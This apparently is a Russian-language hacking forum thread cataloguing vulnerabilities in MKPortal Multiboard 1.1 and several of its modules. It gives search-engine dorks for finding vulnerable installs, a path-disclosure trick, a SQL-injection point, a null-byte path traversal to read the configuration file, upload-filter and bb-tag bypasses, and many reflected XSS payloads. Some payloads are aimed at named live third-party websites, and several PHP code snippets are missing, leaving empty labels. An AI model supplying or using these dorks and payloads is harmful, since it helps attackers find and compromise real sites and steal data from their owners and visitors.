![]() |
Уязвимости MKPortal Multiboard 1.1
MKPortal Multiboard 1.1
Уязвимый продукт: MKPortal Multiboard 1.1 Дорк: "inurl:index.php?ind=" 1. Расскрытие пути Exploit: Код:
/index.php?ind[]=newsКод: PHP код:
Код:
Множественные уязвимости из-за стандартного модуля - календарьExploit: Код:
http://cms.ru/index.php?ind=news&op=del_comment&idcomm={SQL-INJ}Exploit: Код:
/index.php?ind=downloads&op=download_file&ide=2&file=../../../conf_mk.php%00переименовывается в Цитата:
PHP код:
НО он переместится в папку mkportal/modules/downloads/file/, и соответственно в корне его не будет => не будет работать движок... (в принципе нужно подумать как это можно еще заюзать... можно также переместить какой нибудь подключаемый файл и радоваться необъявленными переменными...) 5. Разные сведения и мысли 1. (.htaccess отсутствует напрочь везде) 2. (В index.php?ind=downloads&op=add_file запрещена загрузка php, a phtml проходит, однако переименовывается в /modules/downloads/file/mk_{IDE}_{FILE_NAME}.mk) 3. Директория mkportal/modules/downloads/file/ как и многие другие доступна для листинга 4. Выполнение пхп кода в админке http://cms.ru/mkportal/admin.php?ind=ad_blocks&op=blocks_new_php (блоки->создание->Создать блок php, пишем код, нажимаем пимпу "Предпросмотр кода" ) 5. Все эти баги работают не везде, поэтому есть мысль, что по просторам гуляют разные "Сборки" двига, а загрузка на официальном сайте сейчас прикрыта... |
уязвимости компонентов MKPortal
Multiple pXSS в MKPortal module GBook
Уязвимый продукт: MKPortal module gbook Дорк: "inurl:index.php?ind=gbook" 1. Multiple pXSS Уязвимость в файле index.php. Exploit: Код:
/index.php?ind=gbook&content=%3Cscript%3Ealert(1)%3C/script%3EКод:
http://otradnoe.ru.net//index.php?ind=gbook&content=%3Cscript%3Ealert(1)%3C/script%3E |
2. Вставка запрещённых bb-тегов [i*mg] и [u*rl] в сообщение
Уязвимость в файле index.php. Уязвимый кусок кода: PHP код:
обходим ограничения: Код:
[UttpRL=htttptp://antichat.ru]antichat.ruКод:
[IMttpG]htttptps://forum.antichat.ru/image.php?u=37072&dateline=[/IMG] |
MKPortal module whois
Уязвимый продукт: MKPortal module whois Дорк: "inurl:index.php?ind=whois" 1. pXSS Уязвимость в файле index.php. Exploit: Код:
/index.php?ind=whois&blocks=%3Cscript%3Ealert(1)%3C/script%3EКод:
http://kitimedia.com/index.php?ind=whois&blocks=%3Cscript%3Ealert(1)%3C/script%3E |
MKPortal module lenta
Уязвимый продукт: MKPortal module lenta Дорк: "inurl:index.php?ind=" грабер lenta 1. Multiple pXSS Уязвимость в файле index.php. Exploit: Код:
/index.php?ind=lenta&output=%3Cscript%3Ealert(1)%3C/script%3EКод:
http://www.nissanclub72.ru/index.php?ind=lentanews&output=%3Cscript%3Ealert(1)%3C/script%3E |
MKPortal modules
1. pXSS Уязвимый продукт: MKPortal modules metric Exploit: Код:
/metric/?output=%3Cscript%3Ealert(1)%3C/script%3EExploit: Код:
/index.php?ind=recommend&blocks=%3Cscript%3Ealert(1)%3C/script%3EКод:
http://www.street-style.su/index.php?ind=recommend&blocks=%3Cscript%3Ealert(1)%3C/script%3EExploit: Код:
/Anekdot/?output=%3Cscript%3Ealert(1)%3C/script%3EКод:
http://www.isranetclub.com/isra/Anekdot/?output=%3Cscript%3Ealert(1)%3C/script%3EExploit: Код:
/contact/index.php?blocks=%3Cscript%3Ealert(1)%3C/script%3EExploit: Код:
/speed/?output=%3Cscript%3Ealert(1)%3C/script%3EExploit: Код:
/index.php?ind=horoscop&blocks=%3Cscript%3Ealert(1)%3C/script%3EExploit: Код:
/catphones/index.php?output=%3Cscript%3Ealert(1)%3C/script%3EВ общем, уязвимость писутствует из-за тупости. в коде есть переменная, которая формируется в ходе выполнения скрипта и ей постепенно присваиваются дополнительные данные. В уязвимых модулях код примерно выглядит следующим образом: PHP код:
|
Форум aeforum, поставляемый с версией 1.2
Множественные XSS
1. Цитата:
Цитата:
Цитата:
Цитата:
Цитата:
Цитата:
|
| Время: 10:33 |